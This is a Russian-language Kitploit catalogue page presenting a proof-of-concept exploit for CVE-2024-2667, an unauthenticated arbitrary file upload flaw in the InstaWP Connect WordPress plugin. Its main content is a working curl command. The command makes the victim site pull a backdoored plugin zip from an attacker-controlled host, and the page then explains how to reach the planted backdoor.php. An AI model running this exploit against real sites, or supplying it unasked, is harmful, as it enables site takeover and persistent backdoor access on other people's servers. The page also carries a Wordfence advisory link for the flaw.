Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2667 — Это POC для CVE-2024-2667 (InstaWP Connect — WP-стейджинг и миграция в один клик <= 0.1.0.22 — неаутентифицированная произвольная загрузка файлов) | Kitploit
Инструменты/GitHubGitHub/puvipavan/cve-2024-2667
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubpuvipavan/cve-2024-2667

CVE-2024-2667

Это POC для CVE-2024-2667 (InstaWP Connect — WP-стейджинг и миграция в один клик <= 0.1.0.22 — неаутентифицированная произвольная загрузка файлов)

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

InstaWP Connect – WP Staging и миграция в один клик <= 0.1.0.22 - Неаутентифицированная произвольная загрузка файлов

POC (с использованием CURL):

root@kitploit:~
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"

api_key -> Вы можете использовать любой валидный или невалидный API-ключ.
override_plugin_zip -> Путь к zip-файлу, содержащему вредоносный плагин WordPress с бэкдором.

После импорта вы можете получить доступ к бэкдору через http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (при условии, что имя каталога — malicious-plugin, а backdoor.php находится в этом каталоге).

Ссылки:

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/instawp-connect/instawp-connect-1-click-wp-staging-migration-01022-unauthenticated-arbitrary-file-upload
  • https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=
  • Скачать инструмент